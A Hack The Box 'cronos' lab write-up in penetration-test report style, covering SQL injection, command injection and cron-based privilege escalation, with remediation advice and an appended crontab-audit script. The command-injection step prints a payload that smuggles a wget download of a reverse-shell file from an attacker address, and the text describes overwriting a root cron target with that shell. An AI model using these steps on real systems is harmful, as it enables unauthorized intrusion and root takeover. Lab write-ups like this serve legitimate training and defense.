Lonely Nova's Workshop
Report - HTB cronos Report
1. Port scan result

address | port
---|---
10.10.10.13 | 22, 53, 80
2. Initial access - SQL injection and command injection
Vulnerability Explanation : The admin.cronos.htb web page does not validate its input value, so I could inject an SQL query and access the admin page. The admin.cronos.htb/welcome.php page also does not validate its input value, so I could inject a shell command and obtained a reverse shell.
Vulnerability Fix : Always validate user input. Use parameterized queries for database access, and never pass unvalidated input to a shell command.
Severity : critical
Steps to reproduce the attack :
screenshot :
8.8.8.8; wget http://10.10.14.8/reverse_shell.php
post-exploitation :
3. Privilege escalation
Vulnerability Explanation : There is a misconfiguration in the crontab. The server executes /var/www/laravel/artisan every minute as root, and the file was writable by the low-privileged user I had. I replaced the content of the "artisan" file with reverse_shell.php and obtained a root reverse shell.
Vulnerability Fix : Apply least privilege. Do not run cron jobs as root unless required, and make sure any file executed by a root cron job is owned by root and not writable by other users.
Severity : critical
Steps to reproduce the attack :
screenshot :
post-exploitation :
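As an added defender-side check (this script is not part of the original report), the following shell function audits a crontab for the misconfiguration described in section 3: jobs that run as root but reference a file that a lower-privileged user can modify. The crontab path, the expected owner argument and the fixture files in the demo are assumptions constructed for illustration.

```shell
#!/bin/sh
# Audit a crontab in /etc/crontab format ("min hour dom mon dow user command",
# or "@reboot user command") for jobs that run as root but reference a file a
# lower-privileged user could edit: not owned by the expected owner, or
# group/world-writable. Assumes GNU stat (Linux).
#
# usage: audit_root_cron <crontab_file> [expected_owner]   (default: root)
# Prints one FINDING line per offending file; returns 1 if any, 0 if clean.
audit_root_cron() {
    crontab_file=$1
    expected_owner=${2:-root}
    found=0
    set -f                                 # no globbing while splitting lines
    while IFS= read -r line; do
        # skip blank lines, comments and environment assignments (SHELL=, PATH=)
        printf '%s\n' "$line" | grep -Eq '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' && continue
        set -- $line
        if [ "${1#@}" != "$1" ]; then      # @daily style: user is field 2
            [ "$#" -ge 3 ] && [ "$2" = root ] || continue
            shift 2
        else                               # five time fields, then the user
            [ "$#" -ge 7 ] && [ "$6" = root ] || continue
            shift 6
        fi
        for tok in "$@"; do                # inspect every absolute path in the command
            case "$tok" in /*) ;; *) continue ;; esac
            [ -f "$tok" ] || continue
            mode=$(stat -c '%a' "$tok") || continue
            owner=$(stat -c '%U' "$tok") || continue
            # 022 (octal) = group-write and other-write bits
            if [ "$owner" != "$expected_owner" ] || [ $((0$mode & 022)) -ne 0 ]; then
                printf 'FINDING: root job runs %s (owner=%s mode=%s): %s\n' \
                    "$tok" "$owner" "$mode" "$line"
                found=1
            fi
        done
    done < "$crontab_file"
    set +f
    return $found
}

# Demo on a constructed fixture (not a real system): a root job every minute
# running a world-writable "artisan", as in the misconfiguration above.
demo=$(mktemp -d)
printf '#!/bin/sh\n' > "$demo/artisan" && chmod 666 "$demo/artisan"
printf '* * * * * root /usr/bin/php %s schedule:run\n' "$demo/artisan" > "$demo/crontab"
audit_root_cron "$demo/crontab" "$(id -un)" || echo "crontab needs attention (exit $?)"
rm -rf "$demo"
```

Run it against /etc/crontab and the files under /etc/cron.d on the host being reviewed; any FINDING line is a file that a non-root user could turn into root code execution.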